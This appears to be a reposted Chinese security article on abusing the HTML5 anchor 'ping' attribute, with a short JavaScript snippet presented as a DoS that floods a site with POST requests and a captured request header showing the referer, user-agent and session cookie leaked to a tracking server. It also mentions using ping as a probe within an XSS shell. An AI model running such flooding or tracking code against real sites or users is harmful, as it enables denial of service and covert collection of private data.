前言
上一个月的一则新闻引起了注意说利用a标签ping属性进行DDOS攻击,原来还可以这样玩。今日早读文章由@freebuf授权分享。@FreeBuf,目前国内最知名,用户活跃度最高的安全网站 正文从这开始~~
在HTML5中 标签加入了一个新的属性ping。设计者加入它的理由是, Ping可以使浏览器对外发送一个异步请求,通常用来广告的追踪、点击率统计或完成一次HTTP重定向。
但是听到监视、追踪这个词,你是不是也觉得有点不舒服,所以Ping这个属性真的是很不受欢迎。浏览器一度抵制、进而加入默认关闭必须从如config这样的选项中打开才可以使用,到现在我从caniuse.com上还没有追寻到哪个浏览器支持它,但在我测试中最新版Chrome44是默认支持Ping的。
[h3]一、Ping的用法[/h3]Ping的用法很简单,这里举一个例子。当你点击click me的时候,会异步发送一个POST请求到Ping后面指定的地址,Request Body的内容为PING。有人可能会说,那click me这段代码行不行?答案是否定的,href这个属性必须存在与中,不然Ping也是不会运行的。
[h3]二、死亡之PING[/h3]根据Ping发送POST请求这个特性,我们可以使用循环使之不停的向一个地址追加POST请求,造成DOS攻击。- var link = document.createElement('a');
- link.href="";
- link.ping = 'http://www.xisigr.com/';
- document.head.appendChild(link); link.click();
复制代码 运行上面的代码,就会不停的向xisigr.com发送POST请求。
[h3]三、隐私追踪[/h3]Ping可以进行广告追踪,它可以统计用户都点击了哪些链接以及次数,并使用POST请求把这些信息发送到广告商的服务器上。那么POST的这些信息都包含了什么呢,简单来说HTTP Header的内容都会有,我们来看一个截获的完整信息- HOST: xisigr.com
- CONTENT-LENGTH: 4
- ORIGIN: http://mail.163.com
- PING-FROM: http://****.com/js6/read/readhtml.jsp?mid=458:xtbBygBMgFO+dvBcvQAAsM&font=15&color=064977
- USER-AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
- PING-TO: http://www.baidu.com/
- CONTENT-TYPE: text/ping
- ACCEPT: */*
- REFERER: http://****.com/js6/read/readhtml.jsp?mid=458:xtbBygBMgFO+dvBcvQAAsM&font=15&color=064977ACCEPT-ENCODING: gzip, deflateACCEPT-LANGUAGE: zh-CN,zh;q=0.8COOKIE: sessionid=rnbymrrkbkipn7byvdc2hsem5o0vrr13CACHE-CONTROL: max-age=0CONNECTION: keep-alive
复制代码 PING-FROM、USER-AGENT、REFERER这三个关键信息,直接泄漏了用户的隐私。而这也为我们最爱的XSSSHELL又提供了一个小插件。对于图片探针如果没了新鲜感,那么请试试Ping探针吧,简单的一句[code][/code]就搞定!
追踪这事是攻击者的最爱,我简单做了一个DEMO,打开aping.html这个页面,点击后,你会前往wathwg,并且我异步重定向了下w3.org,但同时你的HTTP Header/IP就被我获取到了。你可以通过这个链接查看截获到的信息,Ping.html。
[h3]四、总结[/h3]把PING归结为探测用户隐私的范畴一点也不为过。这其实不怪设计者,Ping的最初设计理念,是为了使得广告统计更加方便简洁,哪怕是它的重定向功能,也是为了在异步请求的情况下使用户整体提高访问页面速度的快感。但是这仿佛也无法遮掩住PING的潜在探测用户隐私的特性。也许这就是PING的先天性缺陷。
PS:
HTML5中,标签多了几个属性,如download/ping。2012年时,我在百度HI写了一篇《HTML5 A[download] 攻击模型》,就对当时download的攻击思路做了简单的分析,可惜百度HI关闭了,download那篇也石沉大海,但三年下来,再看那篇文章,当时提出的一些攻击点,浏览器也已经做了相应的防御,从中看到了攻防对抗的变化和浏览器厂商的激进与妥协。
这种感悟是挺好的,你可以对应着如笔记般的进行标注,这些变化是什么、为什么这么变等等,我觉得应该时不时的把前些年的文章拿出来,和现在的形式对比下,有些东西不得不从这种长时间轴的总结和更新中才能得出结论来,比如10年间消失的10种WEB攻击、浏览器厂商的激进与妥协、10年后WEB是什么样的……
关于本文
作者:@xisigr
原文:https://www.freebuf.com/articles/network/74173.html
为你推荐
【第1278期】上课啦!了解下 DDoS攻击方式
【第849期】如何让前端更安全?——XSS攻击和防御详解
|
|